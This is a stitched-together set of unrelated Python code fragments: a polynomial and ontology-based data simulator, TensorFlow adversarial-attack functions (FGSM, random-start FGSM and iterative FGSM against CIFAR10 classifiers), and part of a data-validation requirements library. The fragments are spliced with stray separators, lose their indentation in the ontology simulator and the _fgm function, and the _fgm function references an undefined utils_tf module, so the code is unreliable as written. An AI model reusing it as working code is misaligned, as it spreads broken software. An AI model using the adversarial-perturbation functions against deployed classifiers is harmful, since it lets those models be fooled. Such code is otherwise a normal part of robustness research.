        beta = np.concatenate([self.beta_a, self.beta_i])
        return X_s.dot(beta)
    def get_nonzero_powers(self):
        """Return the exponent rows (powers_) of the active interaction
        terms, sampling effects first if needed."""
        if not self.is_beta_built:
            self.sample_effect()
            self.is_beta_built = True
        return self.powers_i_[np.where(self.beta_i != 0)]
class CorrelatedDataSimulator(HigherOrderSimulator):
    def __init__(self,
                 n,
                 p,
                 noise_var=0.1,
                 data_cov_matrix=None,
                 degree=3,
                 with_input_blocks=False,
                 *args, **kwargs):
        """
        Simulator for correlated Xs, inherited from `HigherOrderSimulator`
        The correlated data is achieved by sampling from a multivariate
        normal distribution
        Args:
            data_cov_matrix: (p, p) covariance matrix of the features.
            *args: forwarded to `HigherOrderSimulator`.
            **kwargs: forwarded to `HigherOrderSimulator`.
        Returns:
        """
        super().__init__(
            n=n,
            p=p,
            noise_var=noise_var,
            degree=degree,
            with_input_blocks=with_input_blocks,
            *args, **kwargs)
        # Replace the parent's i.i.d. sampler with a correlated one.
        self.x_rng = self._get_data_rng(data_cov_matrix)
    def _get_data_rng(self, data_cov_matrix):
        # Build a zero-mean multivariate-normal sampler over the p features.
        from numpy.random import multivariate_normal as mvn
        mu = np.zeros(self.p)
        cov = np.array(data_cov_matrix)
        # Covariance must be a (p, p) square matrix.
        assert len(mu) == cov.shape[0] == cov.shape[1]
        rng = lambda x: mvn(mu, cov, size=x)
        return rng
    def sample_data(self, N=None, *args, **kwargs):
        """Draw (X, y) with correlated features; N defaults to self.n.

        Note: unlike the parent, x_rng here takes a sample count (rows),
        not a flat element count.
        """
        N = self.n if N is None else N
        X = self.x_rng(N).reshape(N, self.p)
        X_s = self.polynomial_fitter.transform(X)
        if not self.is_beta_built:
            self.sample_effect()
            self.is_beta_built = True
        beta = np.concatenate([self.beta_a, self.beta_i])
        y = X_s.dot(beta) + np.random.normal(0, np.sqrt(self.noise_var), N)
        if self.with_input_blocks:
            # NOTE(review): X is 2-D here, so the first branch never fires.
            X = [X[:, i] if len(X.shape) > 2 else X[:, i].reshape(X.shape[0], 1) for i in range(X.shape[1])]
        return X, y
class HiddenStateSimulator(HigherOrderSimulator):
    """Noise-free, interaction-only polynomial over observed features plus
    previously computed hidden states; used as one node of the
    ontology-structured simulator below."""
    def __init__(self, n, x_index, h_index=None, degree=2, interaction_strength=None, *args, **kwargs):
        """
        Args:
            n: default number of samples drawn by `sample_data`.
            x_index: indices of the observed features feeding this node.
            h_index: indices of upstream hidden states feeding this node.
            degree: polynomial degree (interaction-only expansion).
            interaction_strength: interaction strength defines drop_i as well as beta_rng for interaction terms
                effect sizes
            *args: forwarded to `HigherOrderSimulator`.
            **kwargs: forwarded to `HigherOrderSimulator`.
        """
        # This node must be deterministic; any noise is added by the caller.
        if "noise_var" in kwargs:
            assert kwargs['noise_var'] == 0, "HiddenStateSimulator must set Noise_var=0; got %s" % kwargs['noise_var']
        self.x_index = x_index
        self.x_len = len(self.x_index)
        self.interaction_strength = interaction_strength
        self.h_index = h_index if h_index is not None else []
        self.h_len = len(self.h_index)
        # the order for concat is x + h
        p = self.x_len + self.h_len
        if interaction_strength is None:
            super().__init__(n=n, p=p, degree=degree, noise_var=0, drop_a=0, *args, **kwargs)
        else:
            super().__init__(n=n, p=p, degree=degree, noise_var=0, drop_a=0, drop_i=1 - interaction_strength, *args,
                             **kwargs)
        # overwrite
        # Re-fit with an interaction-only expansion (no pure powers),
        # replacing the fitter configured by the parent constructor.
        self.polynomial_fitter = PolynomialFeatures(degree=degree, interaction_only=True, include_bias=False)
        self.polynomial_fitter.fit(np.zeros((self.n, self.p)))
        self.beta_a = np.zeros(p)
        self.beta_i = np.zeros(self.polynomial_fitter.n_output_features_ - p)
        self.powers_i_ = self.polynomial_fitter.powers_[p:]
        if self.interaction_strength is None:
            self.beta_i_rng = self.beta_rng
        else:
            # normal distribution has 95% prob. of falling within mu +/- 2*sigma
            self.beta_i_rng = lambda n: np.sign(np.random.uniform(-1, 1, n)) * np.random.uniform(
                self.interaction_strength, 0.1, n)
    def sample_effect(self):
        """Draw additive effects with the base RNG and interaction effects
        with the strength-scaled RNG."""
        # additive
        a_idx = np.random.choice(self.p, int(np.ceil(self.p * (1 - self.drop_a))), replace=False)
        self.beta_a[a_idx] = self.beta_rng(len(a_idx))
        # interaction
        i_idx = np.random.choice(len(self.beta_i), int(np.ceil(len(self.beta_i) * (1 - self.drop_i))), replace=False)
        self.beta_i[i_idx] = self.beta_i_rng(len(i_idx))
        self.is_beta_built = True
    def sample_data(self, N=None, hs=None, *args, **kwargs):
        """Draw (X, y); `hs` supplies upstream hidden-state columns when
        this node has hidden-state inputs (h_index non-empty)."""
        assert self.h_len == 0 or hs is not None, "If h_index is not empty, must parse `hs` in argument"
        N = self.n if N is None else N
        X = self.x_rng(N * self.x_len).reshape(N, self.x_len)
        if hs is not None:
            # Append the selected upstream hidden states after the observed
            # features (the "x + h" concatenation order from __init__).
            h = hs[:, self.h_index]
            X = np.concatenate([X, h], axis=1)
        X_s = self.polynomial_fitter.transform(X)
        if not self.is_beta_built:
            self.sample_effect()
        beta = np.concatenate([self.beta_a, self.beta_i], )
        # noise_var is 0 by construction, so y is deterministic given X.
        y = X_s.dot(beta) + np.random.normal(0, np.sqrt(self.noise_var), N)
        if self.with_input_blocks:
            X = [X[:, i] if len(X.shape) > 2 else X[:, i].reshape(X.shape[0], 1) for i in range(X.shape[1])]
        return X, y
class _OntologyPolynomial:
    """Composes one HiddenStateSimulator per hidden node of an ontology tree;
    the last hidden state (plus Gaussian noise) is the observed response."""
    def __init__(self, ontology_simulator, n, noise_var=0.1):
        # ontology_simulator: provides the tree T (nodes: int feature
        # indices and 'h<i>' hidden-state names) and the raw graph G.
        self.ontology_simulator = ontology_simulator
        self.n = n
        self.hidden_state_simulators = []
        self.hidden_state_nodes = [n for n in ontology_simulator.T.nodes if type(n) is str and n.startswith('h')]
        self.num_nodes = len(ontology_simulator.G)
        self.noise_var = noise_var
        # Per-node simulators are created lazily on the first sample_data().
        self.is_hs_built = False
    def sample_data(self, N=None):
        """Draw (X, y) by evaluating hidden states in index order; y is the
        last hidden state plus noise."""
        N = N if N is not None else self.n
        X = np.zeros((N, self.num_nodes))
        h = np.zeros((N, len(self.hidden_state_nodes)))
        assert (not self.is_hs_built) or len(self.hidden_state_simulators) == len(self.hidden_state_nodes)
        for h_i in range(len(self.hidden_state_nodes)):
            # Feature (int) and hidden-state (str 'h<i>') parents of node h_i.
            x_index = sorted([x for x in self.ontology_simulator.T.predecessors('h%i' % h_i) if type(x) is int])
            h_index = sorted(
                [int(x.lstrip('h')) for x in self.ontology_simulator.T.predecessors('h%i' % h_i) if type(x) is str])
            # Interaction strength for this node = mean parent edge weight.
            interaction_str = np.mean([self.ontology_simulator.T[x]['h%i' % h_i]['weight'] for x in
                                       self.ontology_simulator.T.predecessors('h%i' % h_i)])
            # interaction_str = 0.2
            if not self.is_hs_built:
                self.hidden_state_simulators.append(HiddenStateSimulator(n=self.n, x_index=x_index, h_index=h_index,
                                                                         interaction_strength=interaction_str))
            if h_index:
                x_, y_ = self.hidden_state_simulators[h_i].sample_data(N=N, hs=h)
            else:
                x_, y_ = self.hidden_state_simulators[h_i].sample_data(N=N)
            # Keep only the observed-feature columns; hidden-state columns
            # were appended by HiddenStateSimulator and are dropped here.
            X[:, x_index] = x_[:, 0:(x_.shape[1] - len(h_index))]
            h[:, h_i] = y_
        self.is_hs_built = True
        # Response = last hidden state plus observation noise.
        y = y_ + np.random.normal(0, np.sqrt(self.noise_var), N)
        return X, y
    def get_ground_truth(self, X, return_h=False):
        """Return the noiseless response for X; optionally also the full
        hidden-state matrix."""
        assert self.is_hs_built
        N = X.shape[0]
        h = np.zeros((N, len(self.hidden_state_nodes)))
        for h_i in range(len(self.hidden_state_nodes)):
            x_index = sorted([x for x in self.ontology_simulator.T.predecessors('h%i' % h_i) if type(x) is int])
            h_index = sorted(
                [int(x.lstrip('h')) for x in self.ontology_simulator.T.predecessors('h%i' % h_i) if type(x) is str])
            if h_index:
                h_input = np.concatenate([X[:, x_index], h[:, h_index]], axis=1)
                y_ = self.hidden_state_simulators[h_i].get_ground_truth(h_input)
            else:
                h_input = X[:, x_index]
                y_ = self.hidden_state_simulators[h_i].get_ground_truth(h_input)
            h[:, h_i] = y_
        # NOTE(review): redundant -- is_hs_built was already asserted True.
        self.is_hs_built = True
        y = y_
        if return_h:
            return y, h
        else:
            return y
class OntologySimulator:
def __init__(self, n, layout='spring', seed=None, sampler_kwargs=None):
"""
Args:
n: number of nodes/Xs
layout:
seed:
Examples:
from BioNAS.utils.simulator import OntologySimulator, HiddenStateSimulator
ot = OntologySimulator(20, seed=1710)
ot.draw('ontology_graph.pdf')
x,y =ot.sampler.sample_data(1000)
x_,y_ =ot.sampler.sample_data(100)
from sklearn.linear_model import LinearRegression
lm = LinearRegression().fit(x, y)
print(lm.score(x_, y_)) # test r2=0.505
"""
import networkx as nx
self.n = n
self.seed = seed
self.backend = nx
if layout == 'spring':
self.layout_ = nx.spring_layout
elif layout == 'graphviz':
self.layout_ = lambda g: nx.drawing.nx_agraph.graphviz_layout(g, prog='dot')
else:
raise Exception('cannot understand layout: %s' % layout)
self.G = nx.generators.random_graphs.powerlaw_cluster_graph(n, m=1, p=0., seed=seed)
self.set_weights()
self._build_tree()
if sampler_kwargs is None:
sampler_kwargs = {'n': 1000, 'noise_var': 0.1}
self.sampler = _OntologyPolynomial(self, **sampler_kwargs)
@property
def adjacency_matrix(self):
return self.backend.adjacency_matrix(self.G).todense()
def set_weights(self):
np.random.seed(self.seed)
for e in self.G.edges():
self.G[e[0]][e[1]]['weight'] = np.random.uniform(0.1, 1)
def _build_tree(self):
"""
TODO: still cannot convert G weights to T weights
"""
G = self.G
e_G = sorted([e for e in G.edges(data=True)], key=lambda x: x[-1]['weight'], reverse=True)
e_T = []
cutoffs = [0.7, 0.4, 0.1]
hidden_states_dict = {}
h_count = 0
for cutoff in cutoffs:
sg = self.backend.Graph([e for e in e_G if e[-1]['weight'] >= cutoff])
for cc in self.backend.connected_components(sg):
| |
# Source: haiphanNJIT/StoBatch -- CIFAR10/more_attack.py
import numpy as np
from six.moves import xrange
import tensorflow as tf
from cleverhans.attacks_tf import fgm, fgsm
from build_utils import batch_adv
def model_loss(y, model, mean=True):
    """Softmax cross-entropy loss of a TF graph (FROM cleverhans/utils_tf).

    :param y: correct labels (one-hot)
    :param model: output tensor of the model; if it is the output of a
        softmax op, the logits input of that op is recovered so the
        fused, numerically stable cross-entropy can be used
    :param mean: boolean indicating whether should return mean of loss
        or vector of losses for each input of the batch
    :return: mean of loss if True, otherwise vector with per-sample loss
    """
    producing_op = model.op
    # Peel off a trailing softmax to obtain the raw logits.
    if "softmax" in str(producing_op).lower():
        logits, = producing_op.inputs
    else:
        logits = model
    xent = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y)
    return tf.reduce_mean(xent) if mean else xent
def fgm_pre_computed_grad(x, grad, eps=0.3, ord=np.inf,
                          clip_min=None, clip_max=None,
                          targeted=False):
    """Fast Gradient Method built from a pre-computed gradient tensor.

    :param x: input
    :param grad: pre-computed gradients for x on the pre-trained model
        (use negative (flipped) loss for the gradient if targeted)
    :param eps: the epsilon (input variation parameter)
    :param ord: (optional) Order of the norm (mimics NumPy).
        Possible values: np.inf, 1 or 2.
    :param clip_min: Minimum float value for adversarial example components
    :param clip_max: Maximum float value for adversarial example components
    :param targeted: whether the attack is targeted; the direction is
        assumed to already be encoded in *grad* (see above)
    :return: a tensor for the adversarial example
    """
    if ord == np.inf:
        # sign() has zero derivative everywhere, so stopping the gradient
        # does not change numerical results.  It must NOT be applied for
        # the other norms, whose perturbations have non-zero derivatives.
        normalized_grad = tf.stop_gradient(tf.sign(grad))
    elif ord == 1:
        batch_axes = list(xrange(1, len(x.get_shape())))
        l1_norm = tf.reduce_sum(tf.abs(grad),
                                reduction_indices=batch_axes,
                                keep_dims=True)
        normalized_grad = grad / l1_norm
    elif ord == 2:
        batch_axes = list(xrange(1, len(x.get_shape())))
        l2_norm = tf.sqrt(tf.reduce_sum(tf.square(grad),
                                        reduction_indices=batch_axes,
                                        keep_dims=True))
        normalized_grad = grad / l2_norm
    else:
        raise NotImplementedError("Only L-inf, L1 and L2 norms are "
                                  "currently implemented.")
    # Scale the unit-direction gradient by epsilon and perturb the input.
    adv_x = x + eps * normalized_grad
    # Reset any components that fall outside the clipping box.
    if (clip_min is not None) and (clip_max is not None):
        adv_x = tf.clip_by_value(adv_x, clip_min, clip_max)
    return adv_x
def rand_fgm(sess, x, logits, y=None, eps=0.3, ord=np.inf, rand_eps=0.3, rand_alpha=0.05,
             clip_min=None, clip_max=None,
             targeted=False):
    """TensorFlow FGSM with a random starting perturbation (R+FGSM style).

    :param sess: TF session (unused here; kept for interface compatibility)
    :param x: the input placeholder
    :param logits: the model's output tensor
    :param y: (optional) A placeholder for the model labels. If targeted
        is true, then provide the target label. Otherwise, only provide
        this parameter if you'd like to use true labels when crafting
        adversarial samples. Otherwise, model predictions are used as
        labels to avoid the "label leaking" effect (explained in this
        paper: https://arxiv.org/abs/1611.01236). Default is None.
        Labels should be one-hot-encoded.
    :param eps: the epsilon (input variation parameter)
    :param ord: (optional) Order of the norm (mimics NumPy).
        Possible values: np.inf, 1 or 2.
    :param rand_eps: total random-start budget.
        NOTE(review): currently unused -- confirm whether the combined
        random + gradient step should be clipped to rand_eps overall.
    :param rand_alpha: magnitude of the random starting step
    :param clip_min: Minimum float value for adversarial example components
    :param clip_max: Maximum float value for adversarial example components
    :param targeted: Is the attack targeted or untargeted? Untargeted, the
        default, will try to make the label incorrect.
    :return: a tensor for the adversarial example
    """
    # Random starting point: x + rand_alpha * sign(gaussian noise).
    # BUG FIX: was tf.get_shape(x), which is not a TF API; use tf.shape(x).
    x_rand = x + rand_alpha * tf.sign(tf.random_normal(shape=tf.shape(x), mean=0.0, stddev=1.0))
    # BUG FIX: the body referenced an undefined name `preds`; the model
    # output is passed in as `logits`.
    preds = logits
    if y is None:
        # Using model predictions as ground truth to avoid label leaking
        preds_max = tf.reduce_max(preds, 1, keep_dims=True)
        y = tf.to_float(tf.equal(preds, preds_max))
        y = tf.stop_gradient(y)
        y = y / tf.reduce_sum(y, 1, keep_dims=True)
    # Compute loss.  BUG FIX: `utils_tf` was never imported; use the
    # module-local model_loss() (same cleverhans implementation).
    loss = model_loss(y, preds, mean=False)
    if targeted:
        loss = -loss
    # Define gradient of loss wrt input
    grad, = tf.gradients(loss, x)
    if ord == np.inf:
        # sign() has zero derivative anyway, so stop_gradient changes
        # nothing numerically; do not apply it for the other norms.
        normalized_grad = tf.stop_gradient(tf.sign(grad))
    elif ord == 1:
        red_ind = list(xrange(1, len(x.get_shape())))
        normalized_grad = grad / tf.reduce_sum(tf.abs(grad),
                                               reduction_indices=red_ind,
                                               keep_dims=True)
    elif ord == 2:
        red_ind = list(xrange(1, len(x.get_shape())))
        square = tf.reduce_sum(tf.square(grad),
                               reduction_indices=red_ind,
                               keep_dims=True)
        normalized_grad = grad / tf.sqrt(square)
    else:
        raise NotImplementedError("Only L-inf, L1 and L2 norms are "
                                  "currently implemented.")
    # Multiply by constant epsilon
    scaled_grad = eps * normalized_grad
    # BUG FIX: x_rand was computed but never used; apply the gradient step
    # from the random start.  (The gradient is still evaluated at x, an
    # approximation forced by only having the logits tensor for x.)
    adv_x = x_rand + scaled_grad
    # If clipping is needed, reset all values outside of [clip_min, clip_max]
    if (clip_min is not None) and (clip_max is not None):
        adv_x = tf.clip_by_value(adv_x, clip_min, clip_max)
    return adv_x
def iter_fgsm(sess, x_input_t, labels_t, x_input, labels, batch_size,
              preds_t, target_labels_t,
              steps, total_eps, step_eps,
              clip_min=0.0, clip_max=1.0,
              ord=np.inf, targeted=False):
    """I-FGSM attack. This function directly generates adversarial inputs.

    Builds a single clipped FGSM step tensor, then repeatedly feeds the
    current adversarial batch through it for *steps* iterations.

    :return: NumPy array of adversarial examples for *x_input*.
    """
    # Single-step perturbation, projected back into the total_eps ball.
    eta_t = fgm(x_input_t, preds_t, y=target_labels_t, eps=step_eps, ord=ord,
                clip_min=clip_min, clip_max=clip_max, targeted=targeted) - x_input_t
    if ord == np.inf:
        eta_t = tf.clip_by_value(eta_t, -total_eps, total_eps)
    elif ord in [1, 2]:
        reduc_ind = list(xrange(1, len(tf.shape(eta_t))))
        if ord == 1:
            norm = tf.reduce_sum(tf.abs(eta_t),
                                 reduction_indices=reduc_ind,
                                 keep_dims=True)
        elif ord == 2:
            norm = tf.sqrt(tf.reduce_sum(tf.square(eta_t),
                                         reduction_indices=reduc_ind,
                                         keep_dims=True))
        eta_t = eta_t * total_eps / norm
    x_adv_t = x_input_t + eta_t
    x_adv = x_input
    # Iterate: each pass evaluates x_adv_t with the current x_adv batch.
    for i in range(steps):
        x_adv = batch_adv(sess, x_adv_t, x_input_t, labels_t, x_adv, labels, batch_size)
    # BUG FIX: previously returned `adv_x`, an undefined name.
    return x_adv
def iter_fgsm_t(x_input_t, preds_t, target_labels_t,
                steps, total_eps, step_eps,
                clip_min=0.0, clip_max=1.0, ord=np.inf, targeted=False):
    """I-FGSM attack: build the symbolic tensor for one clipped step.

    The single FGSM perturbation is projected back into the total_eps
    ball (L-inf clipping, or L1/L2 rescaling) before being applied.

    NOTE: *steps* is accepted for interface parity with iter_fgsm() but
    is not used by this symbolic builder.
    """
    one_step_adv = fgm(x_input_t, preds_t, y=target_labels_t, eps=step_eps, ord=ord,
                       clip_min=clip_min, clip_max=clip_max, targeted=targeted)
    eta_t = one_step_adv - x_input_t
    if ord == np.inf:
        # Project the perturbation into the L-inf ball of radius total_eps.
        eta_t = tf.clip_by_value(eta_t, -total_eps, total_eps)
    elif ord in [1, 2]:
        reduc_ind = list(xrange(1, len(tf.shape(eta_t))))
        if ord == 1:
            norm = tf.reduce_sum(tf.abs(eta_t),
                                 reduction_indices=reduc_ind,
                                 keep_dims=True)
        else:
            norm = tf.sqrt(tf.reduce_sum(tf.square(eta_t),
                                         reduction_indices=reduc_ind,
                                         keep_dims=True))
        # Rescale so the perturbation norm equals total_eps.
        eta_t = eta_t * total_eps / norm
    x_adv_t = x_input_t + eta_t
    return x_adv_t
def _fgm(x, preds, y=None, eps=0.3, ord=np.inf,
clip_min=None, clip_max=None,
targeted=False):
"""
TensorFlow implementation of the Fast Gradient Method.
:param x: the input placeholder
:param preds: the model's output tensor (the attack expects the
probabilities, i.e., the output of the softmax)
:param y: (optional) A placeholder for the model labels. If targeted
is true, then provide the target label. Otherwise, only provide
this parameter if you'd like to use true labels when crafting
adversarial samples. Otherwise, model predictions are used as
labels to avoid the "label leaking" effect (explained in this
paper: https://arxiv.org/abs/1611.01236). Default is None.
Labels should be one-hot-encoded.
:param eps: the epsilon (input variation parameter)
:param ord: (optional) Order of the norm (mimics NumPy).
Possible values: np.inf, 1 or 2.
:param clip_min: Minimum float value for adversarial example components
:param clip_max: Maximum float value for adversarial example components
:param targeted: Is the attack targeted or untargeted? Untargeted, the
default, will try to make the label incorrect. Targeted
will instead try to move in the direction of being more
like y.
:return: a tensor for the adversarial example
"""
if y is None:
# Using model predictions as ground truth to avoid label leaking
preds_max = tf.reduce_max(preds, 1, keep_dims=True)
y = tf.to_float(tf.equal(preds, preds_max))
y = tf.stop_gradient(y)
y = y / tf.reduce_sum(y, 1, keep_dims=True)
# Compute loss
loss = utils_tf.model_loss(y, preds, mean=False)
if targeted:
loss = -loss
# Define gradient of loss wrt input
grad, = tf.gradients(loss, x)
if ord == np.inf:
# Take sign of gradient
normalized_grad = tf.sign(grad)
# The following line should not change the numerical results.
# It applies only because `normalized_grad` is the output of
# a `sign` op, which has zero derivative anyway.
# It should not be applied for the other norms, where the
# perturbation has a non-zero derivative.
normalized_grad = tf.stop_gradient(normalized_grad)
elif ord == 1:
red_ind = list(xrange(1, len(x.get_shape())))
normalized_grad = grad / tf.reduce_sum(tf.abs(grad),
reduction_indices=red_ind,
keep_dims=True)
elif | |
from results.
itervalues = getattr(differences, 'itervalues', differences.values)()
filtered = (x for _, x in itervalues if x is not NOVALUE)
description = next(filtered, None)
# Format dictionary values and finalize description.
for key, value in IterItems(differences):
diffs, desc = value
differences[key] = diffs
if description and description != desc and desc is not NOVALUE:
description = None
return differences, description
def whole_requirement(func):
    """A decorator for whole requirement functions. A whole requirement
    function should accept a *data* object and return values appropriate
    for instantiating a :exc:`ValidationError` (either an iterable of
    differences or a 2-tuple containing an iterable of differences and
    a description).
    """
    if getattr(func, '_whole_requirement', False):
        return func  # <- EXIT! (already decorated; idempotent)

    # BUG FIX: previously the function was marked and returned here,
    # making the wrapper below unreachable dead code -- decorated
    # functions never had their results normalized.
    @wraps(func)
    def wrapper(data):
        result = func(data)
        return _normalize_requirement_result(result, func)

    wrapper._whole_requirement = True
    return wrapper
def requirement_handler(requirement):
    """Return a whole-requirement function that provides default
    validation behavior for *requirement*.
    """
    @whole_requirement
    def _requirement_handler(data):
        """Default requirement handler."""
        # A mapping requirement takes priority; otherwise dispatch on
        # whether the data itself is mapping-like.
        if isinstance(requirement, Mapping):
            return _datadict_vs_requirementdict(data, requirement)
        if isinstance(data, (Mapping, IterItems)):
            return _datadict_vs_requirement(data, requirement)
        return _data_vs_requirement(data, requirement)
    return _requirement_handler
def _get_required_func(requirement):
"""Returns a whole-object requirement handler."""
if getattr(requirement, '_whole_requirement', False):
return requirement
return requirement_handler(requirement)
##############################
# Abstract Requirement Classes
##############################
class BaseRequirement(abc.ABC):
    """A class to check that the data fulfills a specific need
    or expectation. All requirement classes must inherit from
    BaseRequirement.
    """
    @abc.abstractmethod
    def check_data(self, data):
        """Check *data*; implemented by subclasses.  Should return an
        iterable of differences, or a (differences, description) tuple."""
        raise NotImplementedError()

    def _verify_difference(self, obj):
        """Raise an error if *obj* is not a subclass of BaseDifference."""
        if not isinstance(obj, BaseDifference):
            slf_name = self.__class__.__name__
            obj_name = obj.__class__.__name__
            message = ('values returned from {0} must be '
                       'difference objects, got {1}: {2!r}')
            raise TypeError(message.format(slf_name, obj_name, obj))

    def _wrap_difference_group(self, group):
        """A generator function to wrap an iterable of differences and
        verify that each value is a difference object.
        """
        for value in group:
            self._verify_difference(value)
            yield value

    def _wrap_difference_items(self, items):
        """A generator function to wrap an iterable of key/value pairs
        and verify that each value is a difference or an iterable of
        difference objects.
        """
        for key, value in items:
            if nonstringiter(value):
                # Non-string iterable: verify members lazily as a group.
                value = self._wrap_difference_group(value)
            else:
                self._verify_difference(value)
            yield key, value

    def _normalize(self, result):
        """Return a normalized *result* as a 2-tuple (containing an
        iterable of differences and a string description) or None.
        """
        # A 2-item sequence whose second item is not itself a difference
        # is treated as (differences, description).
        if (isinstance(result, Sequence)
                and len(result) == 2
                and not isinstance(result[1], BaseDifference)):
            differences, description = result
        else:
            differences = result
            description = ''
        if not description:
            # Fall back to a generic description naming this class.
            description = 'does not satisfy {0}'.format(self.__class__.__name__)
        if not isinstance(differences, Iterable):
            slf_name = self.__class__.__name__
            dff_name = differences.__class__.__name__
            message = (
                '{0!r} should return an iterable or a tuple containing '
                'an iterable and a string description, got {1!r}: {2!r}'
            )
            raise TypeError(message.format(slf_name, dff_name, differences))
        # Peek at the first item without consuming the iterator.
        first_item, differences = iterpeek(differences, NOVALUE)
        if first_item is NOVALUE:
            return None  # <- EXIT! (no differences: data is valid)
        if isinstance(first_item, tuple):
            # Key/value pairs -> mapping-style verification.
            differences = self._wrap_difference_items(differences)
        else:
            differences = self._wrap_difference_group(differences)
        return differences, description

    def __call__(self, data):
        """Check *data*; return (differences, description) or None."""
        result = self.check_data(data)
        return self._normalize(result)
class ItemsRequirement(BaseRequirement):
    """A class to check that items or mappings of data fulfill a
    specific need or expectation.
    """
    @abc.abstractmethod
    def check_items(self, items):
        """Check an iterable of key/value items; subclass hook."""
        raise NotImplementedError()

    def check_data(self, data):
        """Normalize *data* into key/value items and delegate to
        check_items()."""
        normalized = normalize(data, lazy_evaluation=True)
        if isinstance(normalized, Mapping):
            normalized = IterItems(normalized)
        return self.check_items(normalized)
# Sentinel used by GroupRequirement.check_items() to record that per-key
# descriptions disagreed and should be discarded.
_INCONSISTENT = object() # Marker for inconsistent descriptions.
class GroupRequirement(BaseRequirement):
    """A class to check that groups of data fulfill a specific need
    or expectation.
    """
    @abc.abstractmethod
    def check_group(self, group):
        """Check a group (iterable) of elements; subclass hook."""
        raise NotImplementedError()

    def check_items(self, items, autowrap=True):
        """Check each key/value pair, collecting per-key differences and
        a common description (dropped if keys disagree)."""
        differences = []
        description = ''
        check_group = self.check_group  # Hoist attribute lookup.
        for key, value in items:
            if isinstance(value, BaseElement) and autowrap:
                value = [value]  # Wrap element to treat it as a group.
                diff, desc = check_group(value)
                diff = list(diff)
                if len(diff) == 1:
                    diff = diff[0]  # Unwrap if single difference.
                if not diff:
                    continue
            else:
                diff, desc = check_group(value)
                # Peek to skip keys that produced no differences.
                first_element, diff = iterpeek(diff, None)
                if not first_element:
                    continue
            differences.append((key, diff))
            # Merge descriptions: keep one only if all keys agree.
            if description == desc or description is _INCONSISTENT:
                continue
            if not description:
                description = desc
            else:
                description = _INCONSISTENT
        if description is _INCONSISTENT:
            description = ''
        return differences, description

    def check_data(self, data):
        """Normalize *data* and dispatch to check_items() for mappings
        or check_group() for plain groups/elements."""
        data = normalize(data, lazy_evaluation=True)
        if isinstance(data, Mapping):
            data = IterItems(data)
        if isinstance(data, IterItems):
            return self.check_items(data)
        if isinstance(data, BaseElement):
            data = [data]  # Single element becomes a one-item group.
        return self.check_group(data)
##############################
# Concrete Requirement Classes
##############################
class RequiredPredicate(GroupRequirement):
    """A requirement to test data for predicate matches."""
    def __init__(self, obj, show_expected=False):
        # Build the predicate once; keep the raw object for messages.
        self._pred = self.predicate_factory(obj)
        self._obj = obj
        self.show_expected = show_expected

    def predicate_factory(self, obj):
        """Return *obj* as a Predicate (pass-through if it already is
        one).  Subclasses override this to customize matching."""
        if isinstance(obj, Predicate):
            return obj
        return Predicate(obj)

    def _get_differences(self, group):
        """Yield a difference for each element of *group* that fails the
        predicate (or for which the predicate returns a difference)."""
        pred = self._pred
        obj = self._obj
        show_expected = self.show_expected
        for element in group:
            result = pred(element)
            if not result:
                yield _make_difference(element, obj, show_expected)
            elif isinstance(result, BaseDifference):
                # A predicate may return a ready-made difference object.
                yield result

    def check_group(self, group):
        differences = self._get_differences(group)
        description = _build_description(self._obj)
        return differences, description

    def check_items(self, items):
        # This fast path is only valid for RequiredPredicate itself;
        # subclasses fall back to the generic GroupRequirement logic.
        if self.__class__ is not RequiredPredicate:
            return super(RequiredPredicate, self).check_items(items)
        pred = self._pred
        obj = self._obj
        show_expected = self.show_expected
        check_group = self.check_group
        differences = []
        for key, value in items:
            if isinstance(value, BaseElement):
                # Single element: test directly, no group wrapping.
                result = pred(value)
                if not result:
                    diff = _make_difference(value, obj, show_expected)
                elif isinstance(result, BaseDifference):
                    diff = result
                else:
                    continue  # Element satisfied the predicate.
            else:
                diff, desc = check_group(value)
                first_element, diff = iterpeek(diff, None)
                if not first_element:
                    continue  # No differences in this group.
            differences.append((key, diff))
        description = _build_description(obj)
        return differences, description
class RequiredApprox(RequiredPredicate):
    """Require that numeric values are approximately equal.

    Values compare as equal if their difference rounded to the
    given number of decimal places (default 7) equals zero, or
    if the difference between values is less than or equal to
    the given delta.
    """
    def __init__(self, obj, places=None, delta=None, show_expected=False):
        if places is None:
            places = 7
        self.places = places
        self.delta = delta
        super(RequiredApprox, self).__init__(obj, show_expected=show_expected)

    @staticmethod
    def approx_delta(delta, value, other):
        """True if *other* is within *delta* of *value*."""
        try:
            return abs(other - value) <= delta
        except TypeError:
            # Non-numeric operands can never be approximately equal.
            return False

    @staticmethod
    def approx_places(places, value, other):
        """True if *other* equals *value* when the difference is rounded
        to *places* decimal places."""
        try:
            return round(abs(other - value), places) == 0
        except TypeError:
            return False

    def predicate_factory(self, obj):
        """Return Predicate object where numeric components have been
        replaced with approx_places() or approx_delta() functions.
        """
        delta = self.delta
        # Delta-based comparison takes priority over decimal places.
        if delta is not None:
            approx_equal = partial(self.approx_delta, delta)
        else:
            approx_equal = partial(self.approx_places, self.places)
        def approx_or_orig(x):
            # Only numbers get approximate matching; everything else
            # keeps exact Predicate semantics.
            if isinstance(x, Number):
                return partial(approx_equal, x)
            return x
        if isinstance(obj, tuple):
            return Predicate(tuple(approx_or_orig(x) for x in obj))
        return Predicate(approx_or_orig(obj))

    def _get_description(self):
        """Description matching the active comparison mode."""
        if self.delta is not None:
            return 'not equal within delta of {0}'.format(self.delta)
        return 'not equal within {0} decimal places'.format(self.places)

    def check_group(self, group):
        # Reuse predicate checking but swap in an approx-specific
        # description.
        differences, _ = super(RequiredApprox, self).check_group(group)
        return differences, self._get_description()
class RequiredFuzzy(RequiredPredicate):
    """Require that strings match with a similarity greater than
    or equal to *cutoff* (default 0.6).

    Similarity is measured with the ratio() method of the
    difflib.SequenceMatcher class; values range from 1.0 (exactly
    the same) down to 0.0 (completely different).
    """
    def __init__(self, obj, cutoff=0.6, show_expected=False):
        self.cutoff = cutoff
        super(RequiredFuzzy, self).__init__(obj, show_expected=show_expected)

    def predicate_factory(self, obj):
        """Return Predicate object where string components have been
        replaced with fuzzy-matching callables.
        """
        threshold = self.cutoff

        def fuzzy_match(cutoff, a, b):
            # TypeError (e.g. non-string b) means "no match".
            try:
                matcher = difflib.SequenceMatcher(a=a, b=b)
                return matcher.ratio() >= cutoff
            except TypeError:
                return False

        def fuzzy_or_orig(a):
            # Only strings get fuzzy matching; other components keep
            # exact Predicate semantics.
            if isinstance(a, string_types):
                return partial(fuzzy_match, threshold, a)
            return a

        if isinstance(obj, tuple):
